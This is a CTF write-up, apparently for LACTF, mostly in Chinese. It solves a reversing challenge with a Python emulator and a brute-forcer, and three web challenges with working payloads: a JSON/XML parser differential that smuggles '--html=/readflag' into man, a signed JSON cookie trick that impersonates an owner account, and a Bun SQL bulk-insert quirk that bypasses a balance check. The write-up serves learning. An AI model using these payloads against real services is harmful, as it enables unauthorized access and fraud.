                        self.ops.append(('DEC', -delta))
                i += 1
                continue
            
            if 'set $sea' in line and 'mod' not in line:
                self.ops.append(('INPUT', 0))
                i += 1
                continue
            
            if 'logbook = add $logbook 1' in line:
                i += 1
                continue
            
            if 'printf "%s%c"' in line and 'cargo' in line:
                self.ops.append(('OUTPUT', 0))
                i += 1
                continue
            
            m = re.search(r'include\s+"([^"]+)"', line)
            if m:
                called = m.group(1)
                if called != self_name:
                    self.trace(called, depth + 1)
                i += 1
                continue
            
            i += 1

sys.setrecursionlimit(10000)
tracer = Tracer(templates)
tracer.trace("volumeWorker7940")

# Now simulate these ops to extract the expected characters
tape = {}
ptr = 0
expected_chars = []
loop_stack = []

i = 0
ops = tracer.ops
max_iters = 1000000

while i < len(ops) and max_iters > 0:
    max_iters -= 1
    op, val = ops[i]
    
    if op == 'MOVE':
        ptr += val
    elif op == 'INC':
        tape[ptr] = (tape.get(ptr, 0) + val) % 256
    elif op == 'DEC':
        tape[ptr] = (tape.get(ptr, 0) - val + 256) % 256
    elif op == 'INPUT':
        # Before reading input, record the current value of cell[ptr-1]
        # which should be the expected character
        # Actually, the expected char was built up in cell[ptr] or nearby
        # Let me just record the tape state
        expected_val = tape.get(ptr - 1, 0)
        expected_chars.append(expected_val)
        tape[ptr] = 0  # simulate reading 0 (empty input)
    elif op == 'OUTPUT':
        pass
    elif op == 'LOOP_START':
        if tape.get(ptr, 0) == 0:
            # Skip to matching LOOP_END
            depth = 1
            i += 1
            while i < len(ops) and depth > 0:
                if ops[i][0] == 'LOOP_START':
                    depth += 1
                elif ops[i][0] == 'LOOP_END':
                    depth -= 1
                i += 1
            continue
        else:
            loop_stack.append(i)
    elif op == 'LOOP_END':
        if tape.get(ptr, 0) != 0:
            i = loop_stack[-1]
            continue
        else:
            loop_stack.pop()
    
    i += 1

print(f"Total ops: {len(ops)}")
print(f"Expected chars: {expected_chars}")
print(f"As string: {''.join(chr(c) if 32 <= c < 127 else f'\\x{c:02x}' for c in expected_chars)}")

# Also try to compute the expected chars differently
# The BF pattern is: build value in cell[0], read into cell[1], subtract, check
# So before each INPUT, cell[ptr-1] or cell[ptr] should have the target value

# Let me also just simulate with known flag prefix
print("\n--- Simulating with flag prefix 'lactf{' ---")
tape2 = {}
ptr2 = 0
loop_stack2 = []
input_data = "lactf{test_flag_here!!!!!!!!!!!!!!!!}"
input_ptr = 0
output2 = ""

i = 0
max_iters = 10000000
while i < len(ops) and max_iters > 0:
    max_iters -= 1
    op, val = ops[i]
    
    if op == 'MOVE':
        ptr2 += val
    elif op == 'INC':
        tape2[ptr2] = (tape2.get(ptr2, 0) + val) % 256
    elif op == 'DEC':
        tape2[ptr2] = (tape2.get(ptr2, 0) - val + 256) % 256
    elif op == 'INPUT':
        if input_ptr < len(input_data):
            tape2[ptr2] = ord(input_data[input_ptr])
            input_ptr += 1
        else:
            tape2[ptr2] = 0
    elif op == 'OUTPUT':
        output2 += chr(tape2.get(ptr2, 0))
    elif op == 'LOOP_START':
        if tape2.get(ptr2, 0) == 0:
            depth = 1
            i += 1
            while i < len(ops) and depth > 0:
                if ops[i][0] == 'LOOP_START':
                    depth += 1
                elif ops[i][0] == 'LOOP_END':
                    depth -= 1
                i += 1
            continue
        else:
            loop_stack2.append(i)
    elif op == 'LOOP_END':
        if tape2.get(ptr2, 0) != 0:
            i = loop_stack2[-1]
            continue
        else:
            loop_stack2.pop()
    
    i += 1

print(f"Output: {repr(output2)}")

output:

~/Documents/CTF/LACTF/helm hell/helm-hell> python extract_chars.py
Total ops: 2283
Expected chars: [108, 97, 99, 116, 102, 123, 116, 52, 107, 49, 110, 103, 95, 55, 104, 51, 95, 104, 51, 108, 109, 95, 48, 102, 95, 104, 51, 49, 109, 95, 55, 51, 109, 112, 49, 52, 116, 51, 115, 125, 0]
As string: lactf{t4k1ng_7h3_h3lm_0f_h31m_73mp14t3s}\x00

--- Simulating with flag prefix 'lactf{' ---
Output: 'ase'

Flag: lactf{t4k1ng_7h3_h3lm_0f_h31m_73mp14t3s}

lactf-1986

Solver: LemonTea

這題題目給了一個 IMG檔案
先 binwalk
解出了一個 .exe檔案

1 2	~/Documents/CTF/LACTF/extractions/CHALL.IMG.extracted/0/rootfs> file CHALL.EXE CHALL.EXE: MS-DOS executable, MZ for MS-DOS

嗯 MS-DOS 的 binary
好開始分析
那整個 binary 是個 flag checker

計算初始狀態（Hash）：程式會先將整個輸入字串傳入一個雜湊函數，計算出一個 20-bit 的數值（Seed）

驗證過程：
程式使用上述計算出的 Seed 作為初始狀態
它進入一個迴圈，針對輸入字串的每一個字元進行檢查
關鍵步驟：在比對第 i 個字元之前，它會先呼叫一個狀態更新函數
更新後的狀態的低 8 位元會與程式內建的加密數據進行 XOR 運算
運算結果必須等於使用者輸入的第 i 個字元

exploit

TABLE = bytes.fromhex(
    "b68c958f9b854c5eecb6b8c097930b587750b02c7e287af1b604efbe5c4478e89981"
    "048f0340a73ffab708016352e3add1859f9421d52a5c20d43112ceaa16c7addf295d"
    "72fc24902c"
)


def hash_update(acc, carry, b):
    bx = acc & 0xFFFF
    di = carry & 0xFFFF
    for _ in range(6):
        bx_old = bx
        di_old = di
        bx = (bx_old << 1) & 0xFFFF
        di = ((di_old << 1) | (bx_old >> 15)) & 0xFFFF
    ax = acc & 0xFFFF
    dx = carry & 0xFFFF
    ax_old = ax
    dx_old = dx
    ax = (ax_old << 1) & 0xFFFF
    dx = ((dx_old << 1) | (ax_old >> 15)) & 0xFFFF
    ax2 = (ax + bx) & 0xFFFF
    di = (di + dx + (1 if ax2 < bx else 0)) & 0xFFFF
    dx = (acc + ax2) & 0xFFFF
    di = (di + carry + (1 if dx < ax2 else 0)) & 0xFFFF
    sum_dx = dx + b
    cf3 = 1 if sum_dx > 0xFFFF else 0
    dx = sum_dx & 0xFFFF
    acc = dx
    carry_out = (di + cf3) & 0xFFFF
    carry_out &= 0xF
    return acc, carry_out


def transform(acc, carry):
    bx = acc & 0xFFFF
    si_orig = carry & 0xFFFF
    ax = acc & 0xFFFF
    dx = carry & 0xFFFF
    for _ in range(3):
        dx_old = dx
        dx = (dx_old >> 1) & 0xFFFF
        cf = dx_old & 1
        ax_old = ax
        ax = ((ax_old >> 1) | (cf << 15)) & 0xFFFF
    di = (ax ^ bx) & 0xFFFF
    di &= 1
    ax = bx
    dx = si_orig
    dx_old = dx
    dx = (dx_old >> 1) & 0xFFFF
    cf = dx_old & 1
    ax_old = ax
    ax = ((ax_old >> 1) | (cf << 15)) & 0xFFFF
    si = (di << 3) & 0xFFFF
    dx = (dx | si) & 0xFFFF
    dx &= 0xF
    return ax, dx


def solve():
    prefix = b"lactf{"
    for acc0 in range(0x10000):
        for carry0 in range(16):
            acc, carry = acc0, carry0
            h_acc = h_carry = 0
            chars = []
            for i, t in enumerate(TABLE):
                acc, carry = transform(acc, carry)
                ch = t ^ (acc & 0xFF)
                chars.append(ch)
                h_acc, h_carry = hash_update(h_acc, h_carry, ch)
                if (h_acc, h_carry) == (acc0, carry0):
                    if bytes(chars[: len(prefix)]) == prefix:
                        return bytes(chars)
                    break
    return None


if __name__ == "__main__":
    flag = solve()
    print(flag.decode() if flag else "Flag not found")

Flag: lactf{3asy_3nough_7o_8rute_f0rce_bu7_n0t_ea5y_en0ugh_jus7_t0_brut3_forc3}

Web

glotq

Solver: LemonTea

middleware.go

package main

import (
	"bytes"
	"encoding/json"
	"encoding/xml"
	"io"
	"net/http"
	"strings"

	"gopkg.in/yaml.v3"
)

var endpointCommands = map[string]map[string]bool{
	"/json": {"jq": true, "man": true},
	"/yaml": {"yq": true, "man": true},
	"/xml":  {"xq": true, "man": true},
}

type JSONPayload struct {
	Command string   `json:"command"`
	Args    []string `json:"args"`
}

type YAMLPayload struct {
	Command string   `yaml:"command"`
	Args    []string `yaml:"args"`
}

type XMLPayload struct {
	XMLName xml.Name `xml:"request"`
	Command string   `xml:"command"`
	Args    XMLArgs  `xml:"args"`
}

type XMLArgs struct {
	Args []string `xml:"arg"`
}

func SecurityMiddleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodPost {
			http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
			return
		}

		body, err := io.ReadAll(r.Body)
		if err != nil {
			http.Error(w, "Failed to read request body", http.StatusBadRequest)
			return
		}

		r.Body = io.NopCloser(bytes.NewBuffer(body))

		contentType := r.Header.Get("Content-Type")

		var command string
		var args []string

		switch {
		case strings.Contains(contentType, "application/json"):
			var payload JSONPayload
			if err := json.Unmarshal(body, &payload); err != nil {
				http.Error(w, "Failed to parse JSON", http.StatusBadRequest)
				return
			}
			command = payload.Command
			args = payload.Args

		case strings.Contains(contentType, "application/yaml") ||
			strings.Contains(contentType, "text/yaml"):
			var payload YAMLPayload
			if err := yaml.Unmarshal(body, &payload); err != nil {
				http.Error(w, "Failed to parse YAML", http.StatusBadRequest)
				return
			}
			command = payload.Command
			args = payload.Args

		case strings.Contains(contentType, "application/xml") ||
			strings.Contains(contentType, "text/xml"):
			var payload XMLPayload
			if err := xml.Unmarshal(body, &payload); err != nil {
				http.Error(w, "Failed to parse XML", http.StatusBadRequest)
				return
			}
			command = payload.Command
			args = payload.Args.Args

		default:
			http.Error(w, "Unsupported Content-Type. Use application/json, application/yaml, or application/xml", http.StatusUnsupportedMediaType)
			return
		}

		allowedForEndpoint, exists := endpointCommands[r.URL.Path]
		if !exists {
			http.Error(w, "Unknown endpoint", http.StatusNotFound)
			return
		}

		if !allowedForEndpoint[command] {
			http.Error(w, "Command not allowed for this endpoint", http.StatusForbidden)
			return
		}

		if command == "man" {
			if len(args) != 1 {
				http.Error(w, "Man command requires exactly one argument", http.StatusForbidden)
				return
			}
			allowedManArgs := map[string]bool{"jq": true, "yq": true, "xq": true}
			if !allowedManArgs[args[0]] {
				http.Error(w, "Man command argument must be jq, yq, or xq", http.StatusForbidden)
				return
			}
		}

		next.ServeHTTP(w, r)
	})
}

在這段 middleware.go 裡 request body 被用 JSON 解析

handlers.go

package main

import (
	"bytes"
	"encoding/json"
	"encoding/xml"
	"fmt"
	"io"
	"net/http"
	"os/exec"

	"gopkg.in/yaml.v3"
)

var allowedCommands = map[string]bool{
	"jq":  true,
	"yq":  true,
	"xq":  true,
	"man": true,
}

type Response struct {
	Success bool   `json:"success"`
	Output  string `json:"output"`
	Error   string `json:"error,omitempty"`
}

func respondJSON(w http.ResponseWriter, resp Response) {
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(resp)
}

func respondError(w http.ResponseWriter, message string) {
	respondJSON(w, Response{Success: false, Error: message})
}

func respondSuccess(w http.ResponseWriter, output string) {
	respondJSON(w, Response{Success: true, Output: output})
}

func executeCommand(command string, args []string, body []byte) (string, error) {
	if !allowedCommands[command] {
		return "", fmt.Errorf("command not allowed: %s", command)
	}

	cmd := exec.Command(command, args...)
	cmd.Stdin = bytes.NewReader(body)

	output, err := cmd.CombinedOutput()
	if err != nil {
		if len(output) == 0 {
			return fmt.Sprintf("Command failed: %v", err), err
		}
		return string(output), err
	}
	return string(output), nil
}

func JSONHandler(w http.ResponseWriter, r *http.Request) {
	body, err := io.ReadAll(r.Body)
	if err != nil {
		respondError(w, "Failed to read request body")
		return
	}

	var payload JSONPayload
	if err := json.Unmarshal(body, &payload); err != nil {
		respondError(w, "Failed to parse JSON: "+err.Error())
		return
	}

	output, err := executeCommand(payload.Command, payload.Args, body)
	if err != nil {
		respondError(w, output)
		return
	}

	respondSuccess(w, output)
}

func YAMLHandler(w http.ResponseWriter, r *http.Request) {
	body, err := io.ReadAll(r.Body)
	if err != nil {
		respondError(w, "Failed to read request body")
		return
	}

	var payload YAMLPayload
	if err := yaml.Unmarshal(body, &payload); err != nil {
		respondError(w, "Failed to parse YAML: "+err.Error())
		return
	}

	output, err := executeCommand(payload.Command, payload.Args, body)
	if err != nil {
		respondError(w, output)
		return
	}

	respondSuccess(w, output)
}

func XMLHandler(w http.ResponseWriter, r *http.Request) {
	body, err := io.ReadAll(r.Body)
	if err != nil {
		respondError(w, "Failed to read request body")
		return
	}

	var payload XMLPayload
	if err := xml.Unmarshal(body, &payload); err != nil {
		respondError(w, "Failed to parse XML: "+err.Error())
		return
	}

	output, err := executeCommand(payload.Command, payload.Args.Args, body)
	if err != nil {
		respondError(w, output)
		return
	}

	respondSuccess(w, output)
}

然而在 handler.go 則是用 XML 解析
並且他是使用
xml.Unmarshal
那在 Go 裡這個東東會無視 JSON 所以他只吃 XML
那問題點就是在同一個資料被解析兩次 .w.

payload:

curl -X POST "http://TARGET:8080/xml" \
     -H "Content-Type: application/json" \
     -d '{"command":"xq","args":["."],"x":"<request><command>man</command><args><arg>--html=/read
  flag</arg><arg>xq</arg></args></request>"}'

Flag: lactf{PoLY9LOt_TH3_Fl49}

clawcha

Solver: LemonTea

app.js

const crypto = require('crypto');
const express = require('express');
const cookieParser = require('cookie-parser');
const path = require('path');
const inventory = require('./inventory.js');

const port = process.env.PORT ?? 3000;

inventory.addItem({
  name: 'flag',
  probability: 1e-15, // good luck
  msg: process.env.FLAG ?? 'lactf{test_flag}'
});

const secret = process.env.SECRET || crypto.randomBytes(16).toString('hex');

const users = new Map([
  ['r2uwu2', {
    username: 'r2uwu2',
    password: secret,
    owner: true,
  }],
]);

const app = express();

app.use(cookieParser(secret));
app.use(express.json());

app.use('/', express.static(path.join(__dirname, 'site')));

app.use((req, res, next) => {
  if (typeof req.signedCookies.username === 'string') {
    if (users.has(req.signedCookies.username)) {
      res.locals.user = users.get(req.signedCookies.username);
    }
  }
  next();
});

app.post('/claw', (req, res) => {
  const isOwner = res.locals.user?.owner ?? false;
  const item = inventory.gacha(req.body.item);
  const pulled = (item && (Math.random() < item.probability || isOwner))
    ? item
    : null;

  if (pulled === null) {
    res.json({ success: false, msg: 'better luck next time' });
    return;
  }
  res.json({ success: true, msg: pulled.msg });
});

// never-before seen login-register endpoint 🤩
app.post('/login', (req, res) => {
  const username = req.body.username;
  const password = req.body.password;
  if (typeof username !== 'string' || typeof password !== 'string') {
    res.json({ err: 'please provide a username' });
    return;
  }

  if (!users.has(username)) {
    users.set(username, { username, password, owner: false });
  }

  if (users.get(username).password !== password) {
    res.json({ err: 'incorrect creds' });
    return;
  }

  res
    .cookie('username', username, { signed: true })
    .json({ success: true });
});

app.get('/ping', (req, res) => {
  res.send('pong');
});

app.listen(port, () => {
  const url = `http://localhost:${port}`;
  console.log(`Server listening on ${url}`);
});

看了一下我們要拿到 owner（也就是 r2uwu2）
但 password 是 secret
看看 secret 產生的過程

1	const secret = process.env.SECRET \|\| crypto.randomBytes(16).toString('hex');

嗯是隨機的好看來沒用
看到這個

app.use((req, res, next) => {
  if (typeof req.signedCookies.username === 'string') {
    if (users.has(req.signedCookies.username)) {
      res.locals.user = users.get(req.signedCookies.username);
    }
  }
  next();
});

這段 code 在幹嗎
簡單來講：先從 signed cookie 讀取 username 並確認是字串，並且拿這個 string 去當 key 去查 users 這個 Map 找到後就把對應的放進 res.locals.user
那點就在這了因為這段已經被 json 解析過了
那我們只要控制解析過後的字串就能 get owner 了
並且我使用的 username 是 r2u\\u0077u2 因為在解析的當下 \u0077 會被解析成 w

payload1

1	curl -s -X POST https://clawcha.chall.lac.tf/login -H 'Content-Type: application/json' -d '{"username": "j:\"r2u\\\u0077u2\"","password":"pass"}' -c '/tmp/c.txt'

payload2

curl -s -X POST https://clawcha.chall.lac.tf/claw \
            -H 'Content-Type: application/json' \
            -b /tmp/c.txt \
            -d '{"item":"flag"}'

c.txt

cat /tmp/c.txt 
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

clawcha.chall.lac.tf    FALSE    /    FALSE    0    username    s%3Aj%3A%22r2u%5Cu0077u2%22.ubXURlJ0kxAvjlO6qZg6jHKrDd%2B8fmNJL8V65iBsmL8

Flag: lactf{r2u_wu2_json_cookie_exploit}

BOBLES-AND-NARNES

Solver: LemonTea

server.js

import express from 'express';
import cookieParser from 'cookie-parser';
import { SQL } from 'bun';
import books from './books.json';
import { createMemoryArchive, CompressionLevel } from 'zip-bun';

const app = express();
const port = 3000;

const INITIAL_BALANCE = 1000;

const db = new SQL('sqlite://:memory:');

await db`
CREATE TABLE users (
  username TEXT,
  password_hash TEXT,
  balance INT,

  PRIMARY KEY (username)
);

CREATE TABLE sessions (
  id TEXT,
  userid TEXT,

  PRIMARY KEY (id)
  FOREIGN KEY (userid) REFERENCES users(username)
);

CREATE TABLE books (
  id TEXT,
  title TEXT,
  file TEXT,
  price INT,

  PRIMARY KEY (id)
);

CREATE TABLE cart_items (
  username TEXT,
  book_id TEXT,
  is_sample INT,

  FOREIGN KEY (username) REFERENCES users(username)
  FOREIGN KEY (book_id) REFERENCES books(id)
);
CREATE INDEX idx_cart_items_username ON cart_items(username);
`;
await db`INSERT INTO books ${db(books)}`;

const booksLookup = new Map();
for (const book of books) {
  booksLookup.set(book.id, book);
};

app.use(cookieParser());
app.use(express.json());
app.use(express.urlencoded({ extended: true }));

const needsAuth = async (req, res, next) => {
  if (typeof req.cookies.session === 'string') {
    const sessions = await db`SELECT userid FROM sessions WHERE id=${req.cookies.session}`;
    if (sessions.length > 0) {
      res.locals.username = sessions[0].userid;
    }
  }

  if (!res.locals.username) {
    return res.redirect('/login');
  }
  next();
};

app.get('/', needsAuth);

app.use(express.static('site'));

app.post('/login', async (req, res) => {
  const { username, password } = req.body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return res.send('please provide a username/password');
  }
  const potentialUsers = await db`SELECT * FROM users WHERE username=${username}`;
  if (potentialUsers.length === 0) {
    return res.send('user does not exist, try registering first');
  }
  if (!(await Bun.password.verify(password, potentialUsers[0].password_hash))) {
    return res.send('invalid password');
  }
  const sessionId = Bun.randomUUIDv7();
  const session = { id: sessionId, userid: username };
  await db`INSERT INTO sessions ${db(session)}`;
  res.cookie('session', sessionId);
  res.redirect('/');
});

app.post('/register', async (req, res) => {
  const { username, password } = req.body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return res.send('please provide a username/password');
  }
  const potentialUsers = await db`SELECT * FROM users WHERE username=${username}`;
  if (potentialUsers.length > 0) {
    return res.send('user already exists');
  }
  const password_hash = await Bun.password.hash(password);
  const user = { username, password_hash, balance: INITIAL_BALANCE };
  await db`INSERT INTO users ${db(user)}`;

  const sessionId = Bun.randomUUIDv7();
  const session = { id: sessionId, userid: username };
  await db`INSERT INTO sessions ${db(session)}`;
  res.cookie('session', sessionId);
  res.redirect('/');
});

app.get('/cart', needsAuth, async (req, res) => {
  res.json({
    cart: await db`SELECT book_id, is_sample FROM cart_items WHERE username=${res.locals.username}`,
    balance: (await db`SELECT balance FROM users WHERE username=${res.locals.username}`)[0].balance
  });
});

app.post('/cart/add', needsAuth, async (req, res) => {
  const productsToAdd = req.body.products;
  if (!Array.isArray(productsToAdd) || productsToAdd.length === 0) {
    return res.json({ err: 'please add a product to cart' });
  }

  const [{ balance }] = await db`SELECT balance FROM users WHERE username=${res.locals.username}`;
  const [{ cartSum }] = await db`
    SELECT SUM(books.price) AS cartSum
    FROM cart_items
    JOIN books ON books.id = cart_items.book_id
    WHERE cart_items.username = ${res.locals.username} AND cart_items.is_sample = 0
  `;
  const additionalSum = productsToAdd
    .filter((product) => !+product.is_sample)
    .map((product) => booksLookup.get(product.book_id).price ?? 99999999)
    .reduce((l, r) => l + r, 0);

  console.log({ additionalSum, cartSum, balance });
  console.log(additionalSum + cartSum);

  if (additionalSum + cartSum > balance) {
    return res.json({ err: 'too poor, have you considered geting more money?' })
  }
  const cartEntries = productsToAdd.map((prod) => ({ ...prod, username: res.locals.username }));
  await db`INSERT INTO cart_items ${db(cartEntries)}`;
  res.json({ remainingBalance: balance - cartSum - additionalSum });
});

app.post('/cart/checkout', needsAuth, async (req, res) => {
  const cart = await db`SELECT * FROM cart_items WHERE username=${res.locals.username}`;
  const [{ balance }] = await db`SELECT balance FROM users WHERE username=${res.locals.username}`;
  const cartSum = cart
    .filter((item) => !+item.is_sample)
    .map((item) => booksLookup.get(item.book_id).price)
    .reduce((l, r) => l + r, 0);

  console.log(cartSum);

  await db`UPDATE users SET balance=${balance - cartSum} WHERE username = ${res.locals.username}`;
  await db`DELETE FROM cart_items WHERE username=${res.locals.username}`;

  const zipWriter = createMemoryArchive();
  await Promise.all(cart.map(async (item) => {
    const book = booksLookup.get(item.book_id);
    const path = item.is_sample ? book.file.replace(/\.([^.]+)$/, '_sample.$1') : book.file;
    const content = await Bun.file('books/' + path).bytes();
    zipWriter.addFile(path, content, CompressionLevel.NO_COMPRESSION);
  }));
  const zipData = zipWriter.finalizeToMemory();
  res.setHeader('Content-Type', 'application/zip');
  res.setHeader('Content-Disposition', 'attachment; filename="narns-bobles-order.zip"');
  res.send(Buffer.from(zipData));
});

app.listen(port, () => {
  console.log(`Listening on http://localhost:${port}...`);
});

這題是運用 Bun SQL db() 在批量插入時會以第一個物件的 Key 作為整個資料表的 schema
這也就是說，如果第一個產品物件沒有 is_sample 這個欄位，db() 會完全忽略這個欄位，即使後面物件有 is_sample
結果：flag 產品的 is_sample=1 也會被忽略，資料庫中存的實際值是 NULL
並且在餘額檢查使用 !+product.is_sample 這會導致

NULL 被當作 sample 因此可以繞過檢查加入購物車
1 sample 被過濾
結賬的檢查：
從 DB 取出 is_sample 但前面已經讓 is_sample = NULL 了，所以會誤以為是非 sample 就可以 get flag 了

exploit.py

import requests
import zipfile
import io
import random
import string

TARGET = "http://localhost:3000/"
FLAG_BOOK_ID = "2a16e349fb9045fa"
CHEAP_BOOK_ID = "a3e33c2505a19d18"

s = requests.Session()

username = "exploit_" + "".join(random.choices(string.ascii_lowercase, k=8))
password = "password123"

print(f"[*] Registering as {username}")
s.post(f"{TARGET}/register", data={"username": username, "password": password})

print("[*] Adding products: cheap (no is_sample key) + flag (is_sample=1)")
r = s.post(f"{TARGET}/cart/add", json={
    "products": [
        {"book_id": CHEAP_BOOK_ID},
        {"book_id": FLAG_BOOK_ID, "is_sample": 1},
    ]
})
print(f"    Response: {r.json()}")

print("[*] Checking out...")
r = s.post(f"{TARGET}/cart/checkout")

with zipfile.ZipFile(io.BytesIO(r.content)) as z:
    print(z.read("flag.txt"))

Flag: lactf{hojicha_chocolate_dubai_labubu}